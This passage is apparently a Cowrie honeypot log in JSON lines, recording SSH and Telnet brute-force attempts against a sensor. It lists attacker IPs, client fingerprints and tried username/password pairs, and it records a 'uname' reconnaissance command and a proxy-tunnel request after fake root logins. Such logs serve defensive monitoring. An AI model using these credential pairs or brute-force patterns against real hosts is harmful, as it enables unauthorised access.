{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":55976,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b557d1f6fad","protocol":"ssh","message":"New connection: 51.79.164.132:55976 (1.2.3.4:22) [session: 9b557d1f6fad]","sensor":"my-vps","timestamp":"2025-08-28T10:08:39.475407Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:08:39.704437Z","src_ip":"51.79.164.132","session":"9b557d1f6fad"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:08:39.705509Z","src_ip":"51.79.164.132","session":"9b557d1f6fad"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"hadoop123","message":"login attempt [hadoop/hadoop123] failed","sensor":"my-vps","timestamp":"2025-08-28T10:08:42.940763Z","src_ip":"51.79.164.132","session":"9b557d1f6fad"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:08:44.217929Z","src_ip":"51.79.164.132","session":"9b557d1f6fad"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":61162,"dst_ip":"1.2.3.4","dst_port":23,"session":"c5bb0692378f","protocol":"telnet","message":"New connection: 212.227.125.160:61162 (1.2.3.4:23) [session: c5bb0692378f]","sensor":"my-vps","timestamp":"2025-08-28T10:08:48.966833Z"}
{"eventid":"cowrie.session.closed","duration":9.887504816055298,"message":"Connection lost after 9 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:08:58.854233Z","src_ip":"212.227.125.160","session":"c5bb0692378f"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":56588,"dst_ip":"1.2.3.4","dst_port":22,"session":"3551974c0b57","protocol":"ssh","message":"New connection: 51.79.164.132:56588 (1.2.3.4:22) [session: 3551974c0b57]","sensor":"my-vps","timestamp":"2025-08-28T10:09:06.269717Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:09:06.553128Z","src_ip":"51.79.164.132","session":"3551974c0b57"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:09:06.553863Z","src_ip":"51.79.164.132","session":"3551974c0b57"}
{"eventid":"cowrie.login.success","username":"root","password":"A123456a","message":"login attempt [root/A123456a] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:09:09.606088Z","src_ip":"51.79.164.132","session":"3551974c0b57"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T10:09:10.584000Z","src_ip":"51.79.164.132","session":"3551974c0b57"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T10:09:10.584703Z","src_ip":"51.79.164.132","session":"3551974c0b57"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:09:10.834448Z","src_ip":"51.79.164.132","session":"3551974c0b57"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:09:10.835598Z","src_ip":"51.79.164.132","session":"3551974c0b57"}
{"eventid":"cowrie.session.closed","duration":120.00618505477905,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:09:26.203994Z","src_ip":"212.227.125.160","session":"409ee4b656ca"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":43852,"dst_ip":"1.2.3.4","dst_port":22,"session":"62e717984983","protocol":"ssh","message":"New connection: 51.79.164.132:43852 (1.2.3.4:22) [session: 62e717984983]","sensor":"my-vps","timestamp":"2025-08-28T10:09:32.693035Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:09:32.896379Z","src_ip":"51.79.164.132","session":"62e717984983"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:09:32.897038Z","src_ip":"51.79.164.132","session":"62e717984983"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"123456","message":"login attempt [elasticsearch/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T10:09:35.953793Z","src_ip":"51.79.164.132","session":"62e717984983"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:09:37.175555Z","src_ip":"51.79.164.132","session":"62e717984983"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":42446,"dst_ip":"1.2.3.4","dst_port":22,"session":"416235f37cca","protocol":"ssh","message":"New connection: 51.79.164.132:42446 (1.2.3.4:22) [session: 416235f37cca]","sensor":"my-vps","timestamp":"2025-08-28T10:09:58.953977Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:09:59.608754Z","src_ip":"51.79.164.132","session":"416235f37cca"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:09:59.609427Z","src_ip":"51.79.164.132","session":"416235f37cca"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp","message":"login attempt [ftp/ftp] failed","sensor":"my-vps","timestamp":"2025-08-28T10:10:05.518836Z","src_ip":"51.79.164.132","session":"416235f37cca"}
{"eventid":"cowrie.session.closed","duration":"9.1","message":"Connection lost after 9.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:10:08.102947Z","src_ip":"51.79.164.132","session":"416235f37cca"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":19351,"dst_ip":"1.2.3.4","dst_port":22,"session":"53fd9657cabb","protocol":"ssh","message":"New connection: 212.227.125.160:19351 (1.2.3.4:22) [session: 53fd9657cabb]","sensor":"my-vps","timestamp":"2025-08-28T10:10:11.244048Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:10:11.245112Z","src_ip":"212.227.125.160","session":"53fd9657cabb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":19622,"dst_ip":"1.2.3.4","dst_port":22,"session":"be1861b3a340","protocol":"ssh","message":"New connection: 212.227.125.160:19622 (1.2.3.4:22) [session: be1861b3a340]","sensor":"my-vps","timestamp":"2025-08-28T10:10:11.359399Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:10:11.360203Z","src_ip":"212.227.125.160","session":"be1861b3a340"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T10:10:11.474703Z","src_ip":"212.227.125.160","session":"be1861b3a340"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:10:11.819382Z","src_ip":"212.227.125.160","session":"be1861b3a340"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T10:10:11.935183Z","session":"be1861b3a340"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":52070,"dst_ip":"1.2.3.4","dst_port":22,"session":"b4866923e672","protocol":"ssh","message":"New connection: 51.79.164.132:52070 (1.2.3.4:22) [session: b4866923e672]","sensor":"my-vps","timestamp":"2025-08-28T10:10:24.510894Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63678,"dst_ip":"1.2.3.4","dst_port":22,"session":"10ad598b6703","protocol":"ssh","message":"New connection: 212.227.235.229:63678 (1.2.3.4:22) [session: 10ad598b6703]","sensor":"my-vps","timestamp":"2025-08-28T10:10:26.754220Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T10:10:26.755271Z","src_ip":"212.227.235.229","session":"10ad598b6703"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T10:10:26.927984Z","src_ip":"212.227.235.229","session":"10ad598b6703"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:10:27.163417Z","src_ip":"51.79.164.132","session":"b4866923e672"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:10:27.164064Z","src_ip":"51.79.164.132","session":"b4866923e672"}
{"eventid":"cowrie.login.failed","username":"ann","password":"ann","message":"login attempt [ann/ann] failed","sensor":"my-vps","timestamp":"2025-08-28T10:10:28.197107Z","src_ip":"212.227.235.229","session":"10ad598b6703"}
{"eventid":"cowrie.login.failed","username":"ann","password":"ann1","message":"login attempt [ann/ann1] failed","sensor":"my-vps","timestamp":"2025-08-28T10:10:29.359972Z","src_ip":"212.227.235.229","session":"10ad598b6703"}
{"eventid":"cowrie.login.failed","username":"ann","password":"ann123","message":"login attempt [ann/ann123] failed","sensor":"my-vps","timestamp":"2025-08-28T10:10:30.522794Z","src_ip":"212.227.235.229","session":"10ad598b6703"}
{"eventid":"cowrie.login.failed","username":"ann","password":"ann1234","message":"login attempt [ann/ann1234] failed","sensor":"my-vps","timestamp":"2025-08-28T10:10:31.685086Z","src_ip":"212.227.235.229","session":"10ad598b6703"}
{"eventid":"cowrie.login.failed","username":"ann","password":"ann12345","message":"login attempt [ann/ann12345] failed","sensor":"my-vps","timestamp":"2025-08-28T10:10:32.848547Z","src_ip":"212.227.235.229","session":"10ad598b6703"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:10:34.014441Z","src_ip":"212.227.235.229","session":"10ad598b6703"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"123456","message":"login attempt [uftp/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T10:10:35.164598Z","src_ip":"51.79.164.132","session":"b4866923e672"}
{"eventid":"cowrie.session.closed","duration":"13.1","message":"Connection lost after 13.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:10:37.595119Z","src_ip":"51.79.164.132","session":"b4866923e672"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":59770,"dst_ip":"1.2.3.4","dst_port":22,"session":"488598356c59","protocol":"ssh","message":"New connection: 51.79.164.132:59770 (1.2.3.4:22) [session: 488598356c59]","sensor":"my-vps","timestamp":"2025-08-28T10:10:51.009367Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:10:53.353233Z","src_ip":"51.79.164.132","session":"488598356c59"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:10:53.353922Z","src_ip":"51.79.164.132","session":"488598356c59"}
{"eventid":"cowrie.login.failed","username":"awsgui","password":"awsgui","message":"login attempt [awsgui/awsgui] failed","sensor":"my-vps","timestamp":"2025-08-28T10:11:00.990516Z","src_ip":"51.79.164.132","session":"488598356c59"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60400,"dst_ip":"1.2.3.4","dst_port":22,"session":"e468de08615a","protocol":"ssh","message":"New connection: 217.72.205.35:60400 (1.2.3.4:22) [session: e468de08615a]","sensor":"my-vps","timestamp":"2025-08-28T10:11:02.577215Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:11:02.578458Z","src_ip":"217.72.205.35","session":"e468de08615a"}
{"eventid":"cowrie.session.closed","duration":"12.4","message":"Connection lost after 12.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:11:03.437479Z","src_ip":"51.79.164.132","session":"488598356c59"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":45610,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3397ee4e948","protocol":"ssh","message":"New connection: 51.79.164.132:45610 (1.2.3.4:22) [session: d3397ee4e948]","sensor":"my-vps","timestamp":"2025-08-28T10:11:18.305542Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:11:21.042482Z","src_ip":"51.79.164.132","session":"d3397ee4e948"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH